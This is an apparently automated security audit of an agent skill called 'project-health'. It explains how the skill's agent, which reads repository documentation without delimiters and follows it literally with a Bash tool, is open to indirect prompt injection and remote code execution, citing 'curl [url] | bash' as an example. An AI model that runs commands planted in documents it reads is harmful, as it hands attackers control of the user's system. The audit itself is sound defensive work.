project-health
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION] (HIGH): The skill is highly vulnerable to Indirect Prompt Injection (Category 8). Evidence Chain:
  1. Ingestion points: Reads all repository documentation (README.md, SETUP.md, etc.) via Read, Glob, and Grep tools.
  2. Boundary markers: Entirely absent; the agent has no delimiters to distinguish between its own instructions and external content.
  3. Capability inventory: The workflow-validator agent is equipped with the 'Bash' tool for command execution.
  4. Sanitization: Absent; the instructions explicitly command the agent to follow instructions 'literally' and 'without gap-filling.'
- [COMMAND_EXECUTION] (HIGH): The 'workflow-validator.md' agent is granted the 'Bash' tool and instructed to 'verify that documented processes will actually work' by executing steps. This permission can be abused to run any command an attacker places in a documentation file.
- [REMOTE_CODE_EXECUTION] (HIGH): If the audited documentation contains instructions like 'curl [url] | bash', the agent's literal interpretation and available tools allow for full remote code execution on the user's environment.
Recommendations
- AI detected serious security threats
Audit Metadata